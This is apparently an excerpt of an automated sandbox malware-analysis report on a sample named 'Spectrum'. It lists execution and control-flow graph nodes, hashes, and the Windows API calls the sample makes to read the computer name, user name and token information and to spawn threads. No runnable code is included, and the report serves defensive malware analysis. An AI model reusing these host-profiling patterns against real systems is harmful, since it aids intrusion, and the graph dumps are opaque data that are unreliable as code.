                                        • Opcode Fuzzy Hash: 774ac7040ec613a54befba42bbca062f37d2b5ac2ea42f2b2fd4caabd56eda0a
                                        • Instruction Fuzzy Hash: 2C2103B5512704DAE314CF19F985F587BA4BB88310F10D12EE9099ABA1E3BC9581CFC8

                                        Execution Graph

                                        Execution Coverage:4%
                                        Dynamic/Decrypted Code Coverage:97.6%
                                        Signature Coverage:0%
                                        Total number of Nodes:84
                                        Total number of Limit Nodes:1
                                        execution_graph 5454 7781b1 5458 778075 5454->5458 5455 778186 CloseHandle 5455->5458 5456 7780ca GetTokenInformation 5456->5458 5457 7781ad GetTokenInformation 5457->5458 5458->5455 5458->5456 5458->5457 5459 7780a7 5458->5459 5497 778090 5500 778075 5497->5500 5498 778186 CloseHandle 5498->5500 5499 7780a7 5500->5498 5500->5499 5501 7780ca GetTokenInformation 5500->5501 5502 7781ad GetTokenInformation 5500->5502 5501->5500 5502->5500 5536 7757f0 5539 7755ac 5536->5539 5537 7755e4 5539->5536 5539->5537 5540 793870 5539->5540 5541 793876 5540->5541 5543 793893 5541->5543 5544 793720 5541->5544 5543->5539 5546 780c42 5544->5546 5545 7937dd 5545->5543 5546->5544 5546->5545 5547 77e050 VirtualAlloc 5546->5547 5547->5546 5437 775b87 CreateThread 5438 775b1c 5437->5438 5445 775810 5437->5445 5439 775cdf CreateThread 5438->5439 5442 775c20 5438->5442 5440 775c01 5439->5440 5443 7754a0 5439->5443 5441 775c03 CloseHandle 5440->5441 5440->5442 5441->5442 5444 7754b5 5443->5444 5446 775822 5445->5446 5447 775b42 5448 775b07 5447->5448 5448->5447 5449 775cdf CreateThread 5448->5449 5450 775b68 5448->5450 5451 775c01 5449->5451 5453 7754a0 5449->5453 5451->5450 5452 775c03 CloseHandle 5451->5452 5452->5450 5548 775be2 5549 775bfc CloseHandle 5548->5549 5551 775be7 5548->5551 5549->5551 5551->5551 5460 775b00 5461 775bba 5460->5461 5468 7852c0 5461->5468 5463 775bc7 5467 775bde 5463->5467 5473 790080 5463->5473 5469 7852c6 5468->5469 5472 7852ce 5468->5472 5469->5472 5487 77e050 5469->5487 5472->5463 5476 790089 5473->5476 5474 7903e0 GetComputerNameW 5474->5476 5475 790181 VirtualFree 5475->5476 5476->5474 5476->5475 5477 77e050 VirtualAlloc 5476->5477 5478 7903bf GetUserNameW 5476->5478 5479 775c7b 5476->5479 5480 7904d6 GetComputerNameW 5476->5480 5477->5476 5478->5476 5481 778070 5479->5481 5480->5476 5485 778075 5481->5485 5482 778186 CloseHandle 5482->5485 5483 7780ca GetTokenInformation 5483->5485 5484 7781ad GetTokenInformation 5484->5485 5485->5482 5485->5483 5485->5484 5486 7780a7 5485->5486 5486->5467 5488 77e0c3 5487->5488 5489 77e0d8 VirtualAlloc 5488->5489 5489->5488 5490 775860 5491 7852c0 VirtualAlloc 5490->5491 5492 775869 5491->5492 5493 790080 5 API calls 5492->5493 5494 77587d 5493->5494 5495 778070 3 API calls 5494->5495 5496 775870 5495->5496 5552 7755ef 5554 7755ac 5552->5554 5553 793870 VirtualAlloc 5553->5554 5554->5553 5555 7755e4 5554->5555 5529 775b09 5530 775b16 5529->5530 5531 775cdf CreateThread 5530->5531 5534 775c20 5530->5534 5532 775c01 5531->5532 5535 7754a0 5531->5535 5533 775c03 CloseHandle 5532->5533 5532->5534 5533->5534

                                        Executed Functions

                                        Function 007752A0 Relevance: 1.6, APIs: 1, Instructions: 137COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 316 7752a0-7753fe 321 775404-77540e 316->321 322 7b0d4c-7b0d4e 316->322 323 775424 321->323 324 77539b 323->324 325 77542a 323->325 327 775413-775419 324->327 328 77539d-7753a1 324->328 325->324 326 775430-775443 325->326 329 7753a7 328->329 330 7752b0-7752b5 328->330 329->330 331 7753ad 329->331 332 7753f3-7753f9 331->332 333 7753af 331->333 337 775355 332->337 338 77532a 332->338 334 7753e0-7753f1 333->334 334->327 334->332 341 7752d1-7752e7 337->341 342 7752e8-775363 337->342 338->337 340 77532c-77533f 338->340 343 77536b-775390 340->343 341->342 348 775365 342->348 349 7753d1-7753d5 342->349 350 7753c3 343->350 351 775392-77539a 343->351 348->349 353 775367-775369 348->353 349->328 352 7753d7 349->352 351->328 352->334 354 775342-775345 352->354 353->343 355 775400-77540e 354->355 356 77534b 354->356 355->323 356->355 357 775351-775353 356->357 357->337
                                        APIs
                                        • GetSystemDefaultLangID.KERNELBASE ref: 007753C4
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.2960578741.0000000000770000.00000040.00001000.00020000.00000000.sdmp, Offset: 00770000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_770000_Spectrum.jbxd
                                        Similarity
                                        • API ID: DefaultLangSystem
                                        • String ID:
                                        • API String ID: 706401283-0
                                        • Opcode ID: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
                                        • Instruction ID: 438367610b265784832eb1699b21556bac4a8ed501bebfe1629a3bd6498bcd6d
                                        • Opcode Fuzzy Hash: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
                                        • Instruction Fuzzy Hash: 3A41C69290DED58FDF26432448643747BA0AB123EAF9DC5D7D48E8A1F3E2DC4C819366
                                        Function 00790080 Relevance: 5.0, APIs: 3, Instructions: 466COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 0 790080-790286 2 790099-790575 0->2 3 79028c 0->3 6 79057b 2->6 7 790155 2->7 5 790445 3->5 5->2 8 79044b-790457 5->8 6->7 9 790581-790587 6->9 10 7902ef-790495 call 77e050 * 2 7->10 11 790458-790472 GetComputerNameW 8->11 13 79058b 9->13 10->11 55 79043e 10->55 18 79024c-790253 11->18 19 7903ee-7903f4 11->19 16 79058c-790591 13->16 17 790181 VirtualFree 13->17 20 7904ab-7904af 16->20 21 790597 16->21 25 7901a8-7902ac call 7a7164 17->25 22 790255 18->22 23 7901e6 18->23 34 7900da-79023f 19->34 35 7903fa 19->35 46 7904c7 20->46 21->20 27 79059d 21->27 28 7902d3 22->28 31 7901ec-790313 call 7a715c 23->31 32 7902b1-7902be 23->32 25->32 27->20 28->23 33 7902d9 28->33 52 790318-79031e 31->52 40 7903bf-7903d9 GetUserNameW 32->40 41 7902c4 32->41 33->10 34->18 50 790241-79024a 34->50 35->34 43 790400 35->43 48 790331 40->48 41->40 49 7902ca 41->49 51 79b1ee-79b49f 43->51 58 7904cc-7904e6 call 7a9970 GetComputerNameW 46->58 53 790171 48->53 54 790337 48->54 49->28 50->18 50->32 56 790568-79056b 52->56 57 790324 52->57 59 79013f-790146 53->59 60 790173 53->60 54->53 61 79033d 54->61 55->5 56->58 57->56 63 79032a 57->63 70 7904ec-790514 58->70 71 790131 58->71 59->13 65 790230 60->65 66 7905d0-7905d9 61->66 63->48 65->46 67 790236-7905c2 65->67 66->51 67->46 74 7905c8-7905c9 67->74 70->56 72 790089-79008c 71->72 73 790137 71->73 72->25 75 790092 72->75 73->72 76 79013d 73->76 74->66 75->25 78 790098 75->78 76->17 76->59 78->2
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.2960578741.0000000000770000.00000040.00001000.00020000.00000000.sdmp, Offset: 00770000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_770000_Spectrum.jbxd
                                        Similarity
                                        • API ID: ComputerName
                                        • String ID:
                                        • API String ID: 3545744682-0
                                        • Opcode ID: a53a589e1d79c8daebd35e0be32d5c07406a5a25e6b1b8ac5d66ad9906a0b4eb
                                        • Instruction ID: b81fbf0162481c37914a2e92780dc6f138ac3f276c99c6488a729bcfabba38e4
                                        • Opcode Fuzzy Hash: a53a589e1d79c8daebd35e0be32d5c07406a5a25e6b1b8ac5d66ad9906a0b4eb
                                        • Instruction Fuzzy Hash: 26D10532568B0D8FCF28EF58E8457EAB7D1FBA1310F58461FD846C3164DA78DA4586C2
                                        Function 00778070 Relevance: 4.7, APIs: 3, Instructions: 236COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 79 778070-77817e 81 778180 79->81 82 77813d-7781a5 79->82 81->82 85 778161 81->85 88 7781a7 82->88 89 7781bd-7781ca 82->89 87 778163-778170 call 7a7164 85->87 93 778186 CloseHandle 87->93 94 778172 87->94 96 7780f3 89->96 97 7781d0 89->97 95 77818c-778192 93->95 94->95 98 778115-778118 95->98 99 778194 95->99 100 7780f5 96->100 101 77808c 96->101 109 7780c3 97->109 110 7781fe-778201 GetTokenInformation 97->110 107 7780a7 98->107 108 778119-77811a 98->108 99->98 103 77819a 99->103 100->101 112 778077 100->112 105 77808e-778184 101->105 103->82 105->93 105->95 108->107 111 77811c 108->111 109->110 115 7780c9 109->115 116 77820f 110->116 125 7781b7 110->125 111->116 117 7781d7-7781de call 7a715c 112->117 120 7780ca-7780d8 GetTokenInformation 115->120 116->105 122 778215-77821e 116->122 123 7781e3-7781e6 117->123 124 77810f 120->124 122->105 135 778224 122->135 123->120 137 778089 123->137 128 778111 124->128 129 77812d 124->129 125->116 127 7781b9-7781bb 125->127 127->89 128->129 134 778113 128->134 132 778133-7781f0 129->132 133 7780a8 129->133 140 7781f6 132->140 141 7780da-7780f1 132->141 138 7780aa-7780ad 133->138 134->98 135->117 139 778226 135->139 137->120 142 77808b 137->142 138->87 143 7780b3-778203 138->143 139->117 144 778228-7782ee call 775d90 139->144 140->141 146 7781fc 140->146 141->138 142->101 143->87 149 778209 143->149 154 7782f0 144->154 155 77830c-778320 call 775d90 call 77ec00 144->155 146->110 154->155 156 7782f2 154->156 158 7782f7-7782fc call 775d90 155->158 171 778322 155->171 156->158 165 778253-778265 call 791280 158->165 166 778302 158->166 173 77826b 165->173 174 778328 165->174 166->165 169 778308-77830a 166->169 169->155 171->158 172 778324-778326 171->172 172->174 173->174 177 77823f-778243 173->177 178 778335 174->178 179 7782df-77832b 174->179 177->158 183 778287 178->183 184 77829b-77829d 178->184 179->178 182 77832d-778331 179->182 182->178 183->184 186 77824e-778252 183->186 186->165
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.2960578741.0000000000770000.00000040.00001000.00020000.00000000.sdmp, Offset: 00770000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_770000_Spectrum.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4e190fe7d4b3c5e57d75e6528bbdfe52906c1a61a35aefbd00297ac479a6f7d8
                                        • Instruction ID: 868848a603a974ac8c2cf300ec37cb7e3d3aea5409d68944cf386689f9477c79
                                        • Opcode Fuzzy Hash: 4e190fe7d4b3c5e57d75e6528bbdfe52906c1a61a35aefbd00297ac479a6f7d8
                                        • Instruction Fuzzy Hash: 7961D03168CA499FCFE59B28C85C2396AA0FB553E0F98C65AE44EC21A1DF2C8C45D753
                                        Function 00775B09 Relevance: 3.1, APIs: 2, Instructions: 60COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 187 775b09-775d01 192 775d07 187->192 193 775bb4-775ce4 CreateThread 187->193 192->193 195 775d0d 192->195 198 775c01-775c05 CloseHandle 193->198 199 775cea 193->199 197 775d37-775d41 195->197 200 775d43 197->200 201 775d4b-775d52 197->201 198->197 206 775c20-775c68 198->206 199->198 203 775cf0-775cf6 199->203 205 775d54 200->205 204 775d45-775d47 201->204 201->205 203->206 207 775d5f 204->207 208 775d49 204->208 210 775d65 207->210 208->201 208->207 210->210
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.2960578741.0000000000770000.00000040.00001000.00020000.00000000.sdmp, Offset: 00770000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_770000_Spectrum.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                        • Instruction ID: 041df2fddea4ff37a948505663f5ae364304f4ce199b6e7b125e9201dac9ec11
                                        • Opcode Fuzzy Hash: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                        • Instruction Fuzzy Hash: DB01D27070DF478FEF6657248C583797790EB113E4F2481AB888FCA0A1EAEC4901A762
                                        Function 00775910 Relevance: 1.9, APIs: 1, Instructions: 607COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 211 775910-775968 213 775915-7759b8 call 7a9970 call 790df0 211->213 214 77596a 211->214 227 7759bd-7759c2 call 775d90 213->227 214->213 218 775931-78072c 214->218 221 780732-780738 218->221 222 780806-780809 218->222 225 78073e 221->225 226 780800 221->226 229 78079d-7807a6 222->229 225->226 230 780744-780774 225->230 226->222 228 7806b3-7806b7 226->228 236 7759c7-7759ce 227->236 228->229 235 7806bd 228->235 232 7807a8 229->232 233 780791-780793 229->233 238 78077a-78081c 230->238 239 7806d5-7806d9 230->239 232->233 237 7807aa 232->237 240 7807ca-7807cc 233->240 235->229 241 7806c3-7807fe 235->241 242 7759d0 236->242 243 775a1a-775a26 call 775e10 236->243 237->240 238->229 246 7806db 239->246 247 7806df 239->247 241->226 242->243 245 7759d2 242->245 261 775994-77599c 243->261 262 775a0d 243->262 250 7759d4-775a15 call 7911a0 245->250 246->247 251 7806dd 246->251 247->229 251->247 255 78c0cc 251->255 257 78c0e8-78c102 255->257 258 78c0ce-78c0d0 255->258 263 78c0d2-78c0df 257->263 265 78c104 257->265 258->263 268 775a02 261->268 269 77599e-7759f7 261->269 273 775932 262->273 274 775991 262->274 276 78c0e7 263->276 265->263 265->276 268->250 279 77597d 268->279 269->268 278 7759e4-7759ec call 7a21ac 273->278 274->273 277 775993 274->277 277->261 285 775a62-775a6e 278->285 286 7759ed 278->286 279->250 280 77597f-775981 279->280 282 775983-775a38 280->282 282->261 287 775a3e call 7a2190 282->287 288 775a75-775ab3 call 791280 285->288 289 775a70 285->289 286->282 290 7759ee-7759ef 286->290 287->261 303 7759e0 287->303 301 775ab5 288->301 302 775abb-775ac9 288->302 289->288 292 775a72 289->292 290->282 294 7759f1 290->294 292->288 294->213 301->302 304 775ab7-775ab9 301->304 305 775af2-775af5 302->305 303->261 306 7759e2 303->306 304->302 310 775ad5 305->310 311 775adb-775adc 305->311 306->278 310->311 312 775ad7-775ad9 310->312 313 775a45-775a46 311->313 314 775ae2 311->314 312->311 314->313 315 775ae8 314->315 315->305
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.2960578741.0000000000770000.00000040.00001000.00020000.00000000.sdmp, Offset: 00770000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_770000_Spectrum.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
                                        • Instruction ID: 696bf6fa78e42799052a6a666ace71fe9afd22cae606ea70dd819529e7d7a1ba
                                        • Opcode Fuzzy Hash: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
                                        • Instruction Fuzzy Hash: 70F16A2175CE488FDF69A72C68452B977D2F799310F5882AEE14EC3296DD2C9C06C7C2
                                        Function 00775B42 Relevance: 1.6, APIs: 1, Instructions: 92COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 358 775b42-775b47 call 775d90 360 775b4c-775b52 358->360 362 775c42-775c62 call 791280 360->362 363 775b0d 360->363 380 775c26 362->380 381 775c14-775cc0 362->381 363->362 364 775b13 363->364 366 775c8f-775c96 364->366 368 775c29 366->368 369 775c98-775c9a 366->369 372 775cc2-775cc9 call 7752a0 368->372 373 775c2f-775c36 368->373 371 775c9c 369->371 378 775d0e-775d18 371->378 379 775bfa 371->379 388 775ccb 372->388 389 775c69 372->389 373->372 377 775c3c 373->377 377->358 384 775d54 378->384 385 775d1a 378->385 379->378 383 775c00 379->383 380->381 387 775c28 380->387 381->372 383->381 392 775d4b-775d52 385->392 387->368 388->371 393 775ccd 388->393 390 775c6f 389->390 391 775b68-775d75 389->391 390->391 395 775c75 390->395 392->384 396 775d45-775d47 392->396 393->371 397 775ccf-775ce4 CreateThread 393->397 395->366 399 775d5f 396->399 400 775d49 396->400 401 775c01-775c05 CloseHandle 397->401 402 775cea 397->402 405 775d65 399->405 400->392 400->399 406 775d37-775d41 401->406 407 775c20-775c68 401->407 402->401 404 775cf0-775cf6 402->404 404->407 405->405 406->392 409 775d43 406->409 409->384
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.2960578741.0000000000770000.00000040.00001000.00020000.00000000.sdmp, Offset: 00770000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_770000_Spectrum.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
                                        • Instruction ID: daedfd8ffd6f0001a11657f1efebbff7991eb42bedfff814438422c2c0da36cc
                                        • Opcode Fuzzy Hash: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
                                        • Instruction Fuzzy Hash: 9B21B23060CF46CFDF6B9728849877426E1EB543D0F68C6A6944FCF1A2DAEC8C449361
                                        Function 00775B87 Relevance: 1.5, APIs: 1, Instructions: 23threadCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 410 775b87-775b99 CreateThread 411 775cff-775d01 410->411 412 775b1c-775b3b 410->412 413 775d07 411->413 414 775bb4-775ce4 CreateThread 411->414 412->411 413->414 416 775d0d 413->416 420 775c01-775c05 CloseHandle 414->420 421 775cea 414->421 419 775d37-775d41 416->419 422 775d43 419->422 423 775d4b-775d52 419->423 420->419 428 775c20-775c68 420->428 421->420 425 775cf0-775cf6 421->425 427 775d54 422->427 426 775d45-775d47 423->426 423->427 425->428 429 775d5f 426->429 430 775d49 426->430 432 775d65 429->432 430->423 430->429 432->432
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.2960578741.0000000000770000.00000040.00001000.00020000.00000000.sdmp, Offset: 00770000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_770000_Spectrum.jbxd
                                        Similarity
                                        • API ID: CreateThread
                                        • String ID:
                                        • API String ID: 2422867632-0
                                        • Opcode ID: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                        • Instruction ID: 1860bacf43d0ae6ea18c936bc404356d4fedca574eb519debb573d58180ebc64
                                        • Opcode Fuzzy Hash: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                        • Instruction Fuzzy Hash: EDE0867061DF444FDF5A9B2458203293AE5EB89350F1541DEC44EDB1E1CBAD19064796
                                        Function 0077599B Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 433 77599b-77599e 434 7759f7 433->434 435 7759b8 call 790df0 433->435 436 775a02 434->436 439 7759bd-7759c2 call 775d90 435->439 441 7759d4-775a15 call 7911a0 436->441 442 77597d 436->442 445 7759c7-7759ce 439->445 442->441 443 77597f-775981 442->443 446 775983-775a38 443->446 448 7759d0 445->448 449 775a1a-775a26 call 775e10 445->449 454 775994-77599c 446->454 455 775a3e call 7a2190 446->455 448->449 450 7759d2 448->450 449->454 463 775a0d 449->463 450->441 454->436 458 77599e 454->458 455->454 469 7759e0 455->469 458->434 467 775932 463->467 468 775991 463->468 472 7759e4-7759ec call 7a21ac 467->472 468->467 470 775993 468->470 469->454 471 7759e2 469->471 470->454 471->472 475 775a62-775a6e 472->475 476 7759ed 472->476 477 775a75-775ab3 call 791280 475->477 478 775a70 475->478 476->446 479 7759ee-7759ef 476->479 489 775ab5 477->489 490 775abb-775ac9 477->490 478->477 480 775a72 478->480 479->446 482 7759f1 call 7a9970 479->482 480->477 482->435 489->490 491 775ab7-775ab9 489->491 492 775af2-775af5 490->492 491->490 496 775ad5 492->496 497 775adb-775adc 492->497 496->497 498 775ad7-775ad9 496->498 499 775a45-775a46 497->499 500 775ae2 497->500 498->497 500->499 501 775ae8 500->501 501->492
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.2960578741.0000000000770000.00000040.00001000.00020000.00000000.sdmp, Offset: 00770000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_770000_Spectrum.jbxd
                                        Similarity
                                        • API ID: wcscpy
                                        • String ID:
                                        • API String ID: 1284135714-0
                                        • Opcode ID: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
                                        • Instruction ID: ce150c07d7f975eb1e647db8552b2f1561ac9b98b37983949734adf1aa94f95b
                                        • Opcode Fuzzy Hash: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
                                        • Instruction Fuzzy Hash: 3C01D660A1DF80CFDE56971844492797952FBD53E4F28C5AAA24EC7092DDECAD009F82
                                        Function 00775BE2 Relevance: 1.3, APIs: 1, Instructions: 25COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 502 775be2-775be5 503 775be7-775ca3 502->503 504 775bfc-775c05 CloseHandle 502->504 508 775ca5 503->508 509 775ca8-775cb3 call 775e10 503->509 510 775d37-775d41 504->510 511 775c20-775c68 504->511 508->509 512 775ca7 508->512 520 775d26 509->520 521 775cb5 509->521 515 775d43 510->515 516 775d4b-775d52 510->516 512->509 519 775d54 515->519 518 775d45-775d47 516->518 516->519 523 775d5f 518->523 524 775d49 518->524 522 775d27-775d2a call 775910 520->522 521->520 525 775cb7 521->525 530 775d2e 522->530 529 775d65 523->529 524->516 524->523 527 775d5b-775d5d 525->527 527->523 529->529 530->527
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.2960578741.0000000000770000.00000040.00001000.00020000.00000000.sdmp, Offset: 00770000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_770000_Spectrum.jbxd
                                        Similarity
                                        • API ID: CloseHandle
                                        • String ID:
                                        • API String ID: 2962429428-0
                                        • Opcode ID: 5b5d7b071b63003723a190de38853bb16d482f491faa3db3b767200ea78fc1cb
                                        • Instruction ID: b151efd4fa3d2ebc0929364efa80425cfb4345450514a73bf54e8e4de2ce02e2
                                        • Opcode Fuzzy Hash: 5b5d7b071b63003723a190de38853bb16d482f491faa3db3b767200ea78fc1cb
                                        • Instruction Fuzzy Hash: 55E01271758E1BCFEF66A718CE9977526C097243E1324C961880EC7120E9DCCE456722
                                        Function 00778090 Relevance: 1.3, APIs: 1, Instructions: 14COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 531 778090-778096 532 778184 531->532 533 77813c-7781a5 531->533 534 778186 CloseHandle 532->534 535 77818c-778192 532->535 546 7781a7 533->546 547 7781bd-7781ca 533->547 534->535 537 778115-778118 535->537 538 778194 535->538 541 7780a7 537->541 542 778119-77811a 537->542 538->537 539 77819a 538->539 539->533 542->541 543 77811c 542->543 545 77820f 543->545 548 778215-77821e 545->548 549 77808e-778096 545->549 552 7780f3 547->552 553 7781d0 547->553 548->549 556 778224 548->556 549->532 554 7780f5 552->554 555 77808c 552->555 562 7780c3 553->562 563 7781fe-778201 GetTokenInformation 553->563 554->555 565 778077 554->565 555->549 560 7781d7-7781e6 call 7a715c 556->560 561 778226 556->561 571 7780ca-77810f GetTokenInformation 560->571 580 778089 560->580 561->560 566 778228-7782ee call 775d90 561->566 562->563 568 7780c9 562->568 563->545 578 7781b7 563->578 565->560 586 7782f0 566->586 587 77830c-778320 call 775d90 call 77ec00 566->587 568->571 582 778111 571->582 583 77812d 571->583 578->545 581 7781b9-7781bb 578->581 580->571 588 77808b 580->588 581->547 582->583 589 778113 582->589 584 778133-7781f0 583->584 585 7780a8 583->585 594 7781f6 584->594 595 7780da-7780f1 584->595 592 7780aa-7780ad 585->592 586->587 591 7782f2 586->591 596 7782f7-7782fc call 775d90 587->596 619 778322 587->619 588->555 589->537 591->596 598 778163-778170 call 7a7164 592->598 599 7780b3-778203 592->599 594->595 600 7781fc 594->600 595->592 611 778253-778265 call 791280 596->611 612 778302 596->612 598->534 613 778172 598->613 599->598 606 778209 599->606 600->563 621 77826b 611->621 622 778328 611->622 612->611 617 778308-77830a 612->617 613->535 617->587 619->596 620 778324-778326 619->620 620->622 621->622 625 77823f-778243 621->625 626 778335 622->626 627 7782df-77832b 622->627 625->596 631 778287 626->631 632 77829b-77829d 626->632 627->626 630 77832d-778331 627->630 630->626 631->632 634 77824e-778252 631->634 634->611
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.2960578741.0000000000770000.00000040.00001000.00020000.00000000.sdmp, Offset: 00770000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_770000_Spectrum.jbxd
                                        Similarity
                                        • API ID: CloseHandle
                                        • String ID:
                                        • API String ID: 2962429428-0
                                        • Opcode ID: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
                                        • Instruction ID: 86b1e28fe3aae3ea72fcea5d66a1d146968815de766d7bab0d49a6e3fed87baf
                                        • Opcode Fuzzy Hash: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
                                        • Instruction Fuzzy Hash: 19C08C619E990E9A5FF9028CCC2F0F0260082023F0BCCC82E8C0EC0220DD0C8E03809B
                                        Function 0077817F Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 635 77817f 636 778184 635->636 637 778186 CloseHandle 636->637 638 77818c-778192 636->638 637->638 639 778115-778118 638->639 640 778194 638->640 642 7780a7 639->642 643 778119-77811a 639->643 640->639 641 77819a-7781a5 640->641 653 7781a7 641->653 654 7781bd-7781ca 641->654 643->642 644 77811c 643->644 646 77820f 644->646 648 778215-77821e 646->648 649 77808e-778096 646->649 648->649 655 778224 648->655 649->636 663 7780f3 654->663 664 7781d0 654->664 656 7781d7-7781e6 call 7a715c 655->656 657 778226 655->657 678 7780ca-77810f GetTokenInformation 656->678 679 778089 656->679 657->656 660 778228-7782ee call 775d90 657->660 683 7782f0 660->683 684 77830c-778320 call 775d90 call 77ec00 660->684 666 7780f5 663->666 667 77808c 663->667 674 7780c3 664->674 675 7781fe-778201 GetTokenInformation 664->675 666->667 676 778077 666->676 667->649 674->675 680 7780c9 674->680 675->646 694 7781b7 675->694 676->656 688 778111 678->688 689 77812d 678->689 679->678 685 77808b 679->685 680->678 683->684 687 7782f2 683->687 693 7782f7-7782fc call 775d90 684->693 722 778322 684->722 685->667 687->693 688->689 695 778113 688->695 691 778133-7781f0 689->691 692 7780a8 689->692 702 7781f6 691->702 703 7780da-7780f1 691->703 700 7780aa-7780ad 692->700 710 778253-778265 call 791280 693->710 711 778302 693->711 694->646 699 7781b9-7781bb 694->699 695->639 699->654 705 778163-778170 call 7a7164 700->705 706 7780b3-778203 700->706 702->703 709 7781fc 702->709 703->700 705->637 721 778172 705->721 706->705 717 778209 706->717 709->675 725 77826b 710->725 726 778328 710->726 711->710 718 778308-77830a 711->718 718->684 721->638 722->693 723 778324-778326 722->723 723->726 725->726 729 77823f-778243 725->729 730 778335 726->730 731 7782df-77832b 726->731 729->693 735 778287 730->735 736 77829b-77829d 730->736 731->730 734 77832d-778331 731->734 734->730 735->736 738 77824e-778252 735->738 738->710
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.2960578741.0000000000770000.00000040.00001000.00020000.00000000.sdmp, Offset: 00770000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_770000_Spectrum.jbxd
                                        Similarity
                                        • API ID: CloseHandle
                                        • String ID:
                                        • API String ID: 2962429428-0
                                        • Opcode ID: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
                                        • Instruction ID: 6b0c900c96fa80821ac8bb87e4b52a41fcab0e52ad527b28bca587c15d0a988d
                                        • Opcode Fuzzy Hash: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
                                        • Instruction Fuzzy Hash: 26C048A59D961D865AB9268CEC1E0A1255046127F0B88C82AAC0E8A261D95C8D4285A3

                                        Execution Graph

                                        Execution Coverage:0.9%
                                        Dynamic/Decrypted Code Coverage:6.6%
                                        Signature Coverage:11%
                                        Total number of Nodes:91
                                        Total number of Limit Nodes:7
